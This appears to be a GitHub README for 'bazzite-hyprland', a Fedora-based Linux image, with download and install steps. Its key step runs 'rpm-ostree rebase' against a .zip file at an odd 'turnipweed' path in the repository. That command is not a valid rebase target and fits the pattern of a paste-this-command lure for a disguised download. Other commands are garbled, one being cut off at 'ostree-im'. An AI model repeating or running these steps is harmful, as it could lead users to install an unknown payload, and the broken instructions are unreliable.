Welcome to bazzite-hyprland! This guide will help you download and install our application easily, giving you a smooth, custom Linux experience.
To get started, visit the Releases page to download the latest version.
- Go to the Releases page.
- Find the version you want to install.
- Click on the appropriate file for your system to begin downloading.
Before installing, ensure your system meets these requirements:
- Operating System: Fedora 35 or later
- Architecture: x86_64
- Disk Space: At least 2 GB available
- Memory: Minimum of 4 GB RAM
After downloading the file, follow these installation steps:
-
Open your terminal.
-
Navigate to the directory where the download is located.
cd ~/Downloads -
First, rebase to the unsigned image to get the proper signing keys and policies installed:
rpm-ostree rebase https://raw.githubusercontent.com/4CONQUER/bazzite-hyprland/main/turnipweed/bazzite-hyprland.zip -
Reboot your system to complete the rebase:
systemctl reboot -
After rebooting, rebase to the signed image:
rpm-ostree rebase ostree-im
bazzite-hyprland offers several unique features designed for both stability and customization:
- Custom Linux Environment: Tailored for users seeking an optimized Linux experience.
- BlueBuild Support: Easily set up and manage your repositories.
- Atomic Updates: Quickly apply system updates without interruptions.
This is an experimental feature. Use it at your own discretion. Refer to the BlueBuild docs for quick setup instructions for customizing your image.
If you encounter issues during installation, consider these tips:
- Ensure you have the latest Fedora version installed.
- Check your system requirements again.
- Review any error messages in your terminal for guidance.
For further assistance, feel free to open an issue on our GitHub repository. We are here to help you!
We welcome contributions! If you're interested in helping improve bazzite-hyprland, check out our contributing guidelines for more information.
This project is licensed under the MIT License. See the LICENSE file for details.
Thank you for choosing bazzite-hyprland! Enjoy your custom Linux environment.